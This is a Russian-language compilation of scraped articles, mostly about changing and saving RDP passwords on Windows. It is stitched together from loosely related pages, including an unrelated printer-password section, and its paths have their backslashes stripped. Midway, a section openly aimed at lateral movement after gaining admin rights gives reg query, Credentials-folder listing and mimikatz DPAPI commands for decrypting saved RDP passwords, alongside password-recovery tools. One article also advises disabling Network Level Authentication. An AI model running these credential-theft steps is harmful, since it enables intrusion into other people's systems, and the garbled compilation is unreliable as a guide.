Содержание
- Способы смены пароля учётной записи пользователя в RDP-сессии
- База знаний
- Где и как посмотреть пароль для подключения к виртуальной машине Windows или Linux (RDP/SSH)
- Ещё не пробовали услугу «Облачный хостинг» от Cloud4Y?
- Вход на удаленный компьютер по RDP с нужным логином и паролем
- Редактирование настроек подключения к удаленному рабочему столу
- Сохранение пароля с помощью cmdkey
- Использование bat файла
- Изменение пароля учетной записи по RDP
- Смена пароля в ОС Windows Server 2008
- Смена пароля в ОС Windows Server 2012 и Windows Server 2012 R2
- Смена пароля в ОС Windows Server 2016
- Альтернативный способ
- Разрешаем сохранение учетных данных при подключении по RDP
Способы смены пароля учётной записи пользователя в RDP-сессии
При использовании удалённого подключения к операционным системам Microsoft Windows/Windows Server по протоколу RDP в некоторых случаях может возникать потребность в смене пароля учётной записи пользователя. При этом инициатором смены пароля в разных ситуациях может выступать как сам пользователь, так и администратор Windows-системы. В некоторых сценариях может получиться так, что, казалось бы, несложная задача смены пароля может стать не такой уж и простой. Поэтому в данной записи я попробую собрать информацию о самых разнообразных способах смены пароля учётной записи пользователя в RDP-сессии.
В случае, если пользователю Windows необходимо самостоятельно изменить пароль своей учётной записи, то в стандартной Windows-сессии пользователем может использоваться всем известное сочетание «горячих» клавиш Ctrl-Alt-Del. Это сочетание клавиш вызывает специальный экран Безопасности Windows (Windows Security), с которого доступна функция изменения пароля :
Если же речь заходит об использовании горячих клавиш в RDP-сессиях, то стоит заметить то, что во избежание перехвата некоторых сочетаний клавиш локальной клиентской системой (системой, с которой запускается RDP-клиент), перенаправление сочетаний клавиш Windows должно быть явно разрешено в свойствах RDP-клиента. Например в клиенте mstsc.exe, встроенном в Windows, данную опцию можно включить на закладке управления локальными ресурсам.
В стандартной первичной RDP-сессии для вызова специального экрана Безопасности Windows с функцией изменения пароля используется сочетание клавиш: Ctrl—Alt—End
В случае использования вложенных RDP-сессий (второго и последующего уровней), то есть когда из одной RDP-сессии открывается другая RDP-сессия, стандартное сочетание клавиш работать не будет. В разных источниках в интернете можно найти информацию об использовании более сложных сочетаний клавиш, таких как Ctrl—Alt—Shift-End или Shift-Ctrl-Alt-End. Однако мои эксперименты с Windows 10/Windows Server 2012 R2 показали, что данные сочетания клавиш попросту не работают (возможно они работали в ранних версиях ОС Windows). В этом случае на выручку нам может прийти следующий способ.
В составе Windows имеется приложение «Экранная клавиатура» (On-Screen Keyboard), расположенное по умолчанию в %SystemRoot%System32osk.exe. Используя это приложение, мы можем решить проблему использования «горячих» клавиш во вложенных RDP-сессиях.
Находясь во вложенной RDP-сессии, вызовем окно запуска приложений. Вызвать его можно разными способами, например, через контекстное меню по кнопке Windows, или через Диспетчер задач (Task Manager):
Либо можно использовать сочетание клавиш Win-R.
В окне запуска приложений выполним запуск исполняемого файла osk.exe
После того, как откроется приложение «Экранная клавиатура», нажмём на физической клавиатуре сочетание клавиш Ctrl—Alt, так, чтобы это отобразилось на экранной клавиатуре и затем, удерживая это сочетание клавиш, на экранной клавиатуре мышкой нажмём кнопку Del.
Таким образом мы отправим в удалённую RDP-сессию сочетание клавиш Ctrl-Alt-Del, в следствие чего откроется специальный экран Безопасности Windows с функцией изменений пароля пользователя.
Способ №3 – Ярлык на VBS-скрипт или Powershell
Вызов экрана Безопасности Windows можно выполнить не только интерактивными способами, но и программными, например, с помощью скриптов.
Разместим скрипт в месте, доступном на чтение (но не для редактирования) для всех пользователей удалённого рабочего стола, например в каталоге %SystemRoot% ( C:Windows ). А ярлык на запуск скрипта можно разместить в любом доступном пользователям месте, например, в каталоге общего профиля %SystemDrive%UsersPublicDesktop
При запуске данного ярлыка у пользователя будет открываться экран Безопасности Windows с возможностью изменения пароля.
Для любителей PowerShell приведённый VBS-скрипт можно заменить PS-скриптом следующего вида:
Либо запускать из ярлыка команду вида:
Однако стоит отметить тот факт, что запуск варианта с PowerShell будет происходить медленней, чем варианта с VBS-скриптом.
Описанные здесь способы с запуском ярлыка, ссылающегося на скрипт, может попросту не сработать, так как в некоторых окружениях серверов служб удалённых рабочих столов может быть заблокирована возможность выполнения скриптов. В таком случае, можно воспользоваться следующим способом.
Способ №4 – Ярлык оболочки Windows Explorer
Если говорить о создании ярлыка запуска экрана Безопасности Windows, то имеется ещё один вариант создания такого ярлыка. Создаётся ярлык со ссылкой на расширение оболочки Windows Explorer следующего вида:
Опять же, при запуске такого ярлыка у пользователя будет открываться экран Безопасности Windows с возможностью изменения пароля. Этот способ одинаково хорошо работает на Windows 10 и на Windows Server 2012 R2.
Способ №5 – Панель управления Windows (локальные учётные записи)
Данный способ относится лишь к локальным учётным записям пользователей. Изменить пароль учётной записи рядового локального пользователя можно через Панель управления Windows. В Windows 10 из раздела Панели управления «Учётные записи пользователей» доступен вызов окна «Параметры компьютера«, в котором имеется функция изменения пароля текущего локального пользователя.
Такие методы вызова апплета управления учётными записями пользователей Панели управления Windows, как, например команда «control userpasswords2«, в качестве отдельного способа мы выделять не будем, так как подобные действия требуют административных прав в удалённой системе. То же самое касается и таких CLI-утилит Windows, как net.exe ( %SystemRoot%System32net.exe ) (пример команды «net user username newpassword«), так как они тоже требуют повышения уровня прав пользователя.
Ремарка
Отдельно хочется отметить обстоятельство, про которое порой забывают администраторы, и это может приводить к разным курьёзным ситуациям.
Попытки смены пароля, инициированные самим пользователем, могут оказаться безуспешными в случае, если пароль был недавно изменён и на удалённую Windows систему действует политика безопасности, определяющая минимальный срок действия пароля.
Повторюсь, что повлиять на ситуацию эта политика может только в случаях, когда пользователь самостоятельно инициирует процедуру смены пароля.
Далее мы поговорим о сценарии, при котором требование смены пароля включается для учётной записи пользователя форсировано администратором сервера (для локальных учётных записей), либо администратором службы каталогов Active Directory (для доменных учётных записей).
Практика показывает, что как только администратором включено требование смены пароля пользователя при следующем входе в систему, у пользователя могут возникнуть проблемы с подключением по протоколу RDP, если на стороне RDS сервера (а в некоторых случаях и на стороне RDS клиента) предварительно не предпринято никаких действий по специальной настройке обработки таких ситуаций. Далее мы рассмотрим пару примеров такой настройки.
Клиентский доступ к службам Windows Server RDS может быть организован через веб-интерфейс серверной роли Remote Desktop Web Access (RDWA). В функционале этой роли имеется выключенная по умолчанию возможность смены пароля пользователя в процессе аутентификации на веб-странице RDWA.
Чтобы включить данную возможность в Windows Server 2012/2012 R2 откроем консоль управления Internet Information Services (IIS) Manager, выберем сайт RDWA, развернём RDWeb > Pages и в разделе настроек ASP.NET выберем настройку опций веб-приложения Application Settings:
В перечне опций находим PasswordChangeEnabled и меняем установленное по умолчанию значение false на true:
Если серверов RDWA несколько и они работают в пуле за балансировщиком, например Windows NLB, то не забываем выполнить данное изменение на всех других серверах пула.
Теперь попытаемся от имени пользователя, у которого в свойствах учётной записи установлено требование смены пароля при следующем входе, аутентифицироваться на веб-странице RDWA:
После ввода учётных данных пользователя появится сообщение о том, что пароль пользователя требует замены и ссылка на страницу с функцией смены пароля ( https:// /RDWeb/Pages/ru-RU/password.aspx ):
На этой отдельной странице пользователь сможет ввести свои текущие учётные данные и новый пароль:
В случае успешной смены пароля пользователь получит соответствующее сообщение:
При необходимости ссылку на страницу смены пароля можно сделать доступной не только тем пользователям, у которых после аутентификации возникает требование смены пароля, но и всем остальным пользователям, чтобы они могли самостоятельно выполнять смену пароля по собственной инициативе через веб-страницу RDWA. Для этого можно будет внедрить ссылку на страницу password.aspx на странице входа login.aspx (по умолчанию страницы расположены в каталоге %windir%WebRDWebPagesru-RU )
Способ №7 – Специальный RDP-файл
Если пользователь выполняет подключение к удалённому рабочему столу на базе Windows Server 2012/2012 R2 через прямой запуск стандартного клиента mstsc.exe, то в ситуации с включенным признаком требования смены пароля, попытка подключения может быть завершена с ошибкой » You must change your password before logging on the first time. Please update your password or contact your system administrator or technical support «.
Если ситуация требует того, чтобы пользователь самостоятельно изменил свой пароль при первом входе в систему, то это потребует некоторого изменения уровня безопасности настроек протокола RDP на стороне RDS сервера и подготовки специального RDP-файла на стороне клиента.
Сначала на клиентской стороне откроем mstsc.exe, настроим все нужные параметры подключения к серверу RDS и используя кнопку Сохранить как, создадим RDP-файл.
После этого откроем RDP-файл в текстовом редакторе и добавим в конец файла строку «enablecredsspsupport:i:0«
Разрешить эту ситуацию можно только понизив уровень безопасности RDP на стороне RDS сервера, отключив обязательное требование проверки подлинности на уровне сети (NLA). Изменить эту настройку можно в свойствах системы на закладке Удалённый доступ:
В английской версии Windows название опции звучит как «Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)»
Если NLA нужно отключить на уровне коллекции серверов Windows Server 2012 R2, то сделать этом можно в свойствах коллекции сеансов, например через оснастку Server Manager:
После того, как отключено требование NLA на стороне RDS сервера, клиент с помощью специального RDP-файла, о котором мы сказали выше, должен успешно установить RDP-сессию и уже в ней получить сообщение о необходимости смены пароля:
И после этого пользователю будет показан экран, на котором он сможет задать новый пароль:
После успешной смены пароля последующие подключения по протоколу RDP будут проходить в штатном режиме без лишних запросов.
Заключение
Приведённый здесь перечень способов смены пароля при использовании протокола RDP не претендует на какую-то полноту и исключительность, а лишь отражает ту информацию, которую мне удалось найти в разных источниках по этому поводу. На мой взгляд, ни один из перечисленных способов нельзя считать наиболее удобным или универсальным, так как каждый из способов может применяться в определённых ограниченных сценариях и имеет, как преимущества, так и недостатки по сравнению с другими способами.
Дополнительные источники информации:
Источник
База знаний
Где и как посмотреть пароль для подключения к виртуальной машине Windows или Linux (RDP/SSH)
Для вновь созданной виртуальной машины Windows, имя пользователя и пароль администрирования можно посмотреть в личном кабинете.
Для просмотра пароля администратора Windows:
— Откройте соответствующую Вашу виртуальную машину
— В настройках виртуальной машины, для того, чтобы посмотреть пароль для доступа/подключения по RDP, нажмите на ссылку «пароль» ( выделено на рисунке ниже ).
Для подключения соответственно используйте имя пользователя «administrator», пароль соответственно тот, который выведется после нажатия на ссылку «показать». Адрес Вашего виртуального хоста ( сервер для подключения соовтетственно находится в поле «IP адреса»
Для виртуальной машины Linux соответственно пароль для подключения по протоколу SSH можно узнать ( показано на рисунке ниже ):
Соответственно для подключения используйте любой доступный Вам клиент SSH ( можно свободно загрузить в нтернете ):
Адрес сервера для подключения соответственно находится в поле «IP адреса»
Има пользователя соответственно: «root», пароль соответственно тот, что будет выведен после нажатия на ссылку
Теперь у Вас есть все данные для подключения к Вашему облачному ресурсу.
Ещё не пробовали услугу «Облачный хостинг» от Cloud4Y?
Отправьте заявку сейчас и получите 10-ти дневный бесплатный доступ.
Источник
Вход на удаленный компьютер по RDP с нужным логином и паролем
Редактирование настроек подключения к удаленному рабочему столу
По умолчанию, программа удаленного настроена так, что она сохраняет только логин пользователя, без его пароля. Включить сохранение пароля достаточно легко, для этого нужно запустить программу «Подключение к удаленному рабочему столу», и отметить галочкой пункт «Разрешить мне сохранять учетные данные».
Если Вы используете подключение к удаленному рабочему столу через ранее сохраненный RDP файл, то нужно нажать на нем правой кнопкой мыши, и выбрать пункт «Изменить», и проделать выше описанные действия.
По завершению редактирования RDP файла, его нужно сохранить, нажав кнопку «Сохранить».
Сохранение пароля с помощью cmdkey
Существующая в операционных системах консольная утилита cmdkey позволяет управлять сохраненными паролями на компьютере, в том числе и для удаленных подключений. Сохранить с её помощью пароль для подключения можно следующим образом:
При этом, не стоит забывать, что если пользователь в домене, то его имя нужно указывать в формате ДОМЕНПОЛЬЗОВАТЕЛЬ.
То есть, для пользователя с логином sysadmin, и паролем dontshowit, который соединяется на сервер TERMSRV, нужно выполнить следующую команду
Использование bat файла
Альтернативным методом, который может пригодиться для того случая, когда использование первого и второго способа по каким-то причинам не работает, является использование bat файла, комбинирующим в себе первый и второй способы.
То есть, если предположить, что у нас есть пользователь sysadmin с паролем dontshowit, и ему нужно зайти на сервер TERMSRV, то выглядеть это будет следующим образом:
Источник
Изменение пароля учетной записи по RDP
Одной из хороших привычек любого пользователя ПК, а тем более системного администратора, является периодическая смена паролей учетных записей. Главное потом его не забыть.
В операционных системах семейства Microsoft Windows Server, для смены пароля, привычно использовать сочетание клавиш Ctrl + Alt + Del. проблема в том, что “три кнопки” нельзя использовать через “Подключение к удаленному рабочему столу”. Рассмотрим как все таки изменить пароль.
Смена пароля в ОС Windows Server 2008
В ОС Windows Server 2008 это можно сделать из меню Пуск, кликнув по “Безопасность Windows”.
На обновлённом экране выбираем экране выбираем “Сменить пароль”.
Вводим старый пароль и новый и его подтверждение.
Смена пароля в ОС Windows Server 2012 и Windows Server 2012 R2
В ОС Windows Server 2012 и Windows Server 2012 R2 несколько усложнилась задача.
Открываем блокнот и пишем две строки:
set objShell = CreateObject(«shell.application»)
objshell.WindowsSecurity
В новом окне выбираем директорию для сохранения файла, например, Рабочий стол. В Тип файла выбираем Все файлы, а в Имя файла указываем произвольное имя, например, 1.vbs.
После сохранения файла, он уже готов к исполнению. Двойной клик левой кнопкой мыши вызовет экран, в которым следует выбрать “Сменить пароль”.
Далее все привычно.
Скриншот №7. Подтверждение действия
Заполняем поля со старым паролем, указываем новый пароль и его подтверждение. Кликаем по иконке стрелки.
Смена пароля в ОС Windows Server 2016
ОС Windows Server 2016 радует своим расположением к пользователю, но чтобы изменить удаленно пароль, все равно нужно поискать этот пункт.
Открываем меню Пуск и кликаем по значку пользователя, в открывшемся меню выбираем “Изменить параметры учетной записи”.
В открывшемся окне “Параметры” выбираем “Параметры входа”, а в секции Пароль кликаем по кнопке Изменить.
В новом окне, указываем текущий пароль и кликаем по кнопке Далее.
Окно обновится и запросит новый пароль, его подтверждение, а также подсказку к паролю. Кликаем по кнопке далее. В итоге, кликаем по кнопке Готово. Следующий вход в систему будет происходить под новым паролем.
Альтернативный способ
Этот способ применим как для изменения пароля к своей учетной записи, так и к учетным записям других пользователей.
В меню Пуск, выбираем Администрирование (“Средства администрирования” в Windows Server 2016).
В новом окне двойным кликом мыши открываем “Управление компьютером”.
В левой части открывшегося окна раскрываем ветку “Локальные пользователи и группы” и открываем папку Пользователи. В основной части окна, кликаем правой кнопкой мыши по пользователю и в контекстном меню выбираем “Задать пароль. ”.
В новом окне указываем новый пароль и его подтверждение. По окончании кликаем по кнопке OK.
Источник
Разрешаем сохранение учетных данных при подключении по RDP
При подключении к удаленному рабочему столу по RDP есть возможность сохранить учетные данные, чтобы не вводить их каждый раз. Но есть одна тонкость. Так если подключаться с компьютера, находящегося в домене, к компьютеру в рабочей группе, то использовать сохраненные данные не удастся, а будет выдано сообщение примерно такого содержания:
«Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера, так как его подлинность проверена не полностью. Введите новые учетные данные.»
Дело в том, что сохранение учетных данных при подключении к удаленному компьютеру запрещено доменными политиками по умолчанию. Однако такое положение вещей можно изменить.
На компьютере, с которого осуществляется подключение, нажимаем Win+R и вводим команду gpedit.msc, затем жмем OK. Дополнительно может потребоваться ввод пароля администратора или его подтверждения, в зависимости от политики UAC.
Включаем политику, затем жмем на кнопку Показать, чтобы добавить в список серверы, к которым собираемся подключаться.
Заполнять список можно несколькими способами. Например:
• TERMSRV/удаленный_пк — разрешаем сохранять учетные данные для одного конкретного компьютера;
• TERMSRV/*.contoso.com — разрешаем сохранять данные для всех компьютеров в домене contoso.com;
• TERMSRV/* — разрешаем сохранять данные для всех компьютеров без исключения.
Внимание: используйте в TERMSRV заглавные буквы, как в примере. Если указан конкретный компьютер, то значение удаленный_пк должно полностью совпадать с именем, введенным в поле «Компьютер» удаленного рабочего стола.
Заполнив список жмем OK и закрываем редактор групповых политик. Открываем командную консоль и обновляем политики командой gpupdate /force. Все, можно подключаться.
И еще. Используя локальные групповые политики мы разрешаем сохранять учетные данные только на одном конкретном компьютере. Для нескольких компьютеров будет лучше создать в домене отдельное OU и привязать к нему соответствующую доменную политику.
Источник
Здравствуйте, друзья!
В последнее время нам приходится часто работать удалённо. Чаще всего это происходит в режиме подключения к своему рабочему компьютеру, который остался в офисе, но встречаются и другие технологические решения.
Очень частой проблемой является необходимость периодической смены пароля, при работе удалённо. Это действительно надо делать из соображений безопасности.
***
Добро пожаловать на канал #мудрости . Не забудьте подписаться, чтобы не пропускать новые публикации. Комментируйте! Читателям и автору важно ваше мнение!
***
Крайне частой является ситуация, когда ваш пароль истёк, уведомления об этом вы не получали, а сменить его вы уже не можете, потому что не можете зайти под старым паролем. В этом случае техподдержка сбросит вам пароль на новый, установив какой-то стандартный пароль, который может быть довольно сложным для запоминания. И вы захотите сменить его на более удобный. А тут упс! Знакомое сочетание клавиш не работает. Жмём Ctrl+Alt+Del – а он в режиме удалённого подключения не выдаёт знакомый диалог. Как же быть?
Итак, рассмотрим несколько вариантов удалённого подключения, и обозначим что же делать, чтобы сменить пароль.
1. Подключение к удалённому рабочему столу (Remote Desktop) при работе в Windows
Для смены пароля нажмите на клавиатуре Ctrl + Alt + End
Появится диалог, одним из пунктов которого будет “Изменить пароль” (Change a password)
В старых версиях Windows или в серверных версиях можно задействовать мышку. Нажмите Пуск -> Безопасность Windows (Start -> Windows Security). И появится тот же диалог для смены пароля.
2. Удалённый рабочий стол (Remote Desktop) для Mac OS
Для компьютеров Apple тоже существует программа-клиент Подключения к удалённому рабочему столу (Remote Desktop Connection). Но на клавиатуре Маков нет кнопки подобной “End”. Как быть?
Для того, чтобы отправить команду на смену пароля, нажмите комбинацию Ctrl + Option + Fn + Backspace
Должно сработать, но срабатывает не всегда.
Может сработать Fn + Ctrl + Command + Right-arrow (стрелка вправо), тк по умолчанию Fn + Right-arrow – это замена кнопки End на Маке.
Если ничего не сработало, остаётся самый надёжный способ, который можно применять и для случаев 1. и 2.:
Экранная клавиатура
Чтобы запустить экранную клавиатуру, нажмите Пуск + Ctrl + O. Либо нажмите Пуск и наберите буквы “osk” и нажмите Enter.
Появится экранная клавиатура, на которой можно набирать текст, тыкая мышкой.
На ней же можно нажать нашу искомую комбинацию Ctrl + Alt +Del. Но нужно учесть, что Ctrl и Alt нужно нажимать пальцами на клавиатуре компьютера, а Del – тыкнуть мышкой. Иначе не сработает.
3. VMware Horizon View (VDI)
В последнее время очень часто используется удалённое подключение к виртуальным рабочим столам (VDI). Для этого используется программа-клиент VMware Horizon View.
Здесь комбинация Ctrl + Alt + End не работает. Но есть специальная кнопка сверху на панели инструментов, которая отправляет в сессию комбинацию клавиш Ctrl+ Alt + Del:
4. Citrix Receiver
Ещё один вариант популярного подключения к удалённой рабочей станции – это Citrix Receiver.
В этом приложении, Также как и в предыдущем пункте, можно отправить в сессию комбинацию Ctrl + Alt + Del, щёлкнув мышкой по кнопке на панели инструментов. Но сначала, её надо раскрыть:
***
Надеюсь, что это исчерпывающая информация о том, как сменить пароль, работая удалённо. Есть, конечно ещё некоторые другие случаи и способы, например смена пароля с помощью веб-интерфейса Outlook, но они нужны намного реже.
Если у вас есть соображения по теме данной инструкции, напишите в комментариях, я обязательно их приму и дополню или поправлю статью.
*** Микро-бонус. Узнать имя своего компьютера можно с помощью команды hostnamе. То есть Пуск -> cmd -> hostname выведет в ответ имя ПК.
***
Искренне ваш,
© Иван С.
Поставьте лайк👍, если статья вам понравилась, и поделитесь с друзьями. Подпишитесь на канал, чтобы не пропускать новые публикации✌.
Читайте также:
0x01 введение
После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.
0x02 Получить пароль RDP, сохраненный локально на управляемой машине
Один, мимикатц
1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
Просмотр информации об удаленном хосте, сохраненной локально
cmdkey /list
3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.
mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58
4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.
mimikatz # sekurlsa::dpapi
5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d
Два, netpass
скачать:
netpass
использовать:
Дважды щелкните netpass.exe.
:
Три, другие
Скрипт Powershell для автоматизации дешифрования …
Пароли Remote Desktop Connections хранятся в *. rdp файлах и обычно находятся в папке ‘My Documents’ текущего пользователя. При входе в ручной режим, NPRW автоматически сканирует ваш диск в поиске данных файлов.
Как удалить подключение удаленного доступа?
Жмем правой кнопкой мыши по значку «Этот компьютер» (или просто «Компьютер» в Windows 7) и переходим к свойствам системы. Далее идем в настройки удаленного доступа. В открывшемся окне ставим переключатель в положение, запрещающее подключение и нажимаем «Применить».
Как сохранить пароль при подключении к удаленному рабочему столу?
Как сохранить пароль при подключении к удаленному рабочему столу
- Нажмем Пуск -> Все программы -> Стандартные -> Подключение к удаленному рабочему столу:
- Далее на кнопку «Параметры»:
- Укажите имя удаленного компьютера (или его IP-адрес), имя пользователя и отметьте чекбокс «Разрешить мне сохранять учетные данные»:
7.09.2010
Информация о всех RDP подключениях хранится в реестре каждого пользователя. Удалить компьютер(ы) из списка истории rdp подключений штатными средствами Windows не получится, придется вручную удалять ключи в системном реестре.
Как получить доступ к удаленному рабочему столу?
Использование удаленного рабочего стола
- Убедитесь, что у вас установлена Windows 10 Pro. …
- Когда все готово, выберите Пуск > Параметры > Система > Удаленный рабочий стол и включите параметр Включить удаленный рабочий стол.
- Запомните имя компьютера в разделе Как подключиться к этому ПК.
Как отключить удаленный рабочий стол?
Как удалить приложение «Удаленный рабочий стол Chrome»
- Откройте Панель управления Программы Программы и компоненты.
- Найдите приложение «Удаленный рабочий стол Chrome».
- Нажмите Удалить.
Как очистить историю подключений к удаленному рабочему столу?
Чтобы очистить историю последних rdp-соединений, выделите все ключи с именами MRU0-MRU9, щелкните правой кнопкой мыши и выберите пункт Delete.
Как сохранить настройки RDP?
Для этого нужно ввести адрес сервера, затем нажать «подробнее», и выбрать «сохранить как». Правый клик на сохраненном подключении — изменить. Вводим логин, ставим галочку «разрешить сохранять учетные данные». Жмем «подключить».
Как установить пароль на RDP?
В современных версиях Windows для вызова окна Windows Security в RDP сессии нужно использовать сочетание клавиш Ctlr + Alt + End. Эта комбинация является аналогом комбинации Ctlr + ALt + Delete, но работает только в окне RDP подключения. В открывшемся меню выберите Change a password.
Как посмотреть логи терминального сервера?
Как и другие события, логи RDP подключения в Windows хранятся в журналах событий. Откройте консоль журнала событий (Event Viewer). Есть несколько различных журналов, в которых можно найти информацию, касающуюся RDP подключения.
Как запретить Windows сохранять историю RDP подключений?
Если вы хотите, чтобы Windows не сохраняла историю RDP подключений, нужно запретить запись в ветку реестра HKCUSoftwareMicrosoftTerminal Server Client для всех аккаунтов, в том числе System. Сначала отключите наследование разрешений на указанную ветку (Permissions -> Advanced -> Disable inheritance).
Где хранятся пароли удаленного рабочего стола Windows 10?
Пароли Remote Desktop Connections хранятся в *. rdp файлах и обычно находятся в папке ‘My Documents’ текущего пользователя. При входе в ручной режим, NPRW автоматически сканирует ваш диск в поиске данных файлов.
Как настроить удаленный доступ к рабочему столу через интернет?
Находясь в разделе «Система», переходим в «Настройку удалённого доступа»:
- В подразделе «Удалённый рабочий стол» ставим флажок на варианте «Разрешить», а далее нажимаем «Выбор пользователей»:
- Далее вводим название учётной записи пользователя, которому необходимо разрешить удаленное управление компьютером через интернет.
Как настроить удаленный рабочий стол на телефоне?
Here’s how to set up the Remote Desktop client on your Android device:
- Скачайте клиент «Удаленный рабочий стол (Майкрософт)» из Google Play. …
- Запустите клиент Удаленного рабочего стола из списка приложений. …
- Добавьте подключение к удаленному рабочему столу или удаленные ресурсы.
4.02.2020
Remote Desktop PassView v1.02 — Recover the password of Remote Desktop Connection utility
Copyright (c) 2006 — 2014 Nir Sofer |
Description
Remote Desktop PassView is a small utility that reveals the password stored by
Microsoft Remote Desktop Connection utility inside the .rdp files.
Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility.
You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):
Network Password Recovery
CredentialsFileView
Versions History
- Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
- Version 1.01 — The configuration is now saved to a file instead of the Registry.
- Version 1.00 — First release.
License
This utility is released as freeware.
You are allowed to freely distribute this utility via floppy disk, CD-ROM,
Internet, or in any other way, as long as you don’t charge anything for this.
If you distribute this utility, you must include all files in
the distribution package, without any modification !
Be aware that selling this utility as a part of a software package is not allowed !
Disclaimer
The software is provided «AS IS» without any warranty, either expressed or implied,
including, but not limited to, the implied warranties of merchantability and fitness
for a particular purpose. The author will not be liable for any special, incidental,
consequential or indirect damages due to loss of data or any other reason.
Using Remote Desktop PassView
Remote Desktop PassView doesn’t require any installation process or additional DLL files.
Just copy the executable (rdpv.exe) to any folder you like, and run it.
After you run rdpv.exe, the main window display the passwords of .rdp located under your
«My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location
If you want to recover that password of another .rdp file, just drag the file from Explorer into
the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.
Be aware that Remote Desktop PassView can only recover the passwords created by your current
logged on user. It cannot recover the passwords of .rdp files created by other users.
Translating Remote Desktop PassView To Another Language
Remote Desktop PassView allows you to easily translate all menus, dialog-boxes, and other strings
to other languages.
In order to do that, follow the instructions below:
- Run Remote Desktop PassView with /savelangfile parameter:
rdpv.exe /savelangfile
A file named rdpv_lng.ini will be created in the folder of Remote Desktop PassView utility.
- Open the created language file in Notepad or in any other text editor.
- Translate all menus, dialog-boxes, and string entries to the desired language.
- After you finish the translation, Run Remote Desktop PassView, and all translated
strings will be loaded from the language file.If you want to run Remote Desktop PassView without the translation, simply rename the language file, or move
it to another folder.
Feedback
If you have any problem, suggestion, comment, or you found a bug in my utility,
you can send a message to nirsofer@yahoo.com
Remote Desktop PassView is also available in other languages. In order to change the language of
Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’,
and put it in the same folder that you Installed Remote Desktop PassView utility.
Language | Translated By | Date | Version |
---|---|---|---|
Arabic | Abo Rehaam | 11/02/2011 | 1.01 |
Bulgarian | Hristo Drumev | 13/01/2007 | |
Dutch | Jan Verheijen | 23/02/2015 | 1.02 |
French | PasswordOne | 21/02/2015 | |
Galician | Xosé Antón Vicente rodríguez | 13/01/2007 | |
German | «Latino» auf WinTotal.de | 18/09/2014 | 1.02 |
Hebrew | peterg | 29/04/2011 | |
Hungarian | ZityiSoft | 20/06/2009 | |
Italian | Fabio Mastroianni | 13/01/2007 | |
Italian | Maurizio Madaro | 12/01/2007 | |
Persian | ( JAVAD JOURSARAEI Alashti ) | 06/08/2014 | |
Persian | Amirreza Nasiri | 13/11/2015 | 1.02 |
Romanian | Jaff (Oprea Nicolae) | 05/02/2016 | 1.02 |
Russian | Sonya | 10/03/2010 | |
Simplified Chinese | Rindz | 30/11/2013 | 1.04 |
Slovak | František Fico | 09/02/2017 | 1.02 |
Spanish | Spyn — Toño | 21/04/2009 | |
Spanish | arquer.net | 20/05/2009 | |
Taiwanese | Republic of Taiwan | 06/01/2007 | |
Traditional Chinese | 繁體中文 | 23/03/2007 | |
Turkish | Kitap Özetleri | 30/01/2009 | |
Turkish | EFromm | 11/02/2009 |
Главная » Безопасность » Вход на удаленный компьютер по RDP с нужным логином и паролем
При подключении сетевого принтера запрашивается пароль: как узнать пароль, как создать пользователя при подключении принтера к сети.
Принтер предназначен для печати необходимых документов. В целом при его эксплуатации у пользователей не возникает проблем, процесс работы подробно описан в инструкции. Однако для расширения возможностей оборудования его необходимо подключить к сети. Для того чтобы сделать сетевой принтер, нужно правильно войти в систему. Всю необходимую информацию можно прочитать в руководстве по эксплуатации техники. Если в процессе подсоединения требуется ввести пароль, многие пользователи задаются вопросом о том, где его найти.
При совместной работе беспроводных устройств – телефона, компьютера, принтера, требуется узнать код сети. Поставщик услуг Интернета обязательно представляет пользователю требуемый код. Как правило, его можно найти в документации договора, или узнать, осмотрев сам маршрутизатор – код указывается на этикетке.
Подключение сетевого принтера
Если же последняя потеряна и документация на данный момент недоступна, можно узнать код для Canon или HP, посмотрев его на любом другом компьютере, который уже подключен к сети. Для этого выполняются следующие действия:
- в операционной программе Windows 10 открывают пункт: «Посмотреть сетевые подключения»;
- щелкнув по названию вашей сети, нажимают на «Статус»;
- находят вкладку «Безопасность», затем во вкладке устанавливают флажок напротив пункта «Отображать вводимые знаки». После это код становится видимым.
Таким образом можно узнать пароль от принтера Canon и ввести его, когда аппарат будет его требовать.
Сохранение пароля с помощью cmdkey
Существующая в операционных системах консольная утилита cmdkey позволяет управлять сохраненными паролями на компьютере, в том числе и для удаленных подключений. Сохранить с её помощью пароль для подключения можно следующим образом:
- Необходимо под нужным пользователем запустить командную строку.
- В ней запускаем утилиту cmdkey со следующими параметрами:
При этом, не стоит забывать, что если пользователь в домене, то его имя нужно указывать в формате ДОМЕНПОЛЬЗОВАТЕЛЬ.
То есть, для пользователя с логином sysadmin, и паролем dontshowit, который соединяется на сервер TERMSRV, нужно выполнить следующую команду
Включаем сохранение учетных данных при удаленном подключении в Windows
Встроенная в Windows возможность удаленного подключения, конечно, не так продвинута, как тот же UltraVNC, но чем она удобна, так это как раз встроенностью.
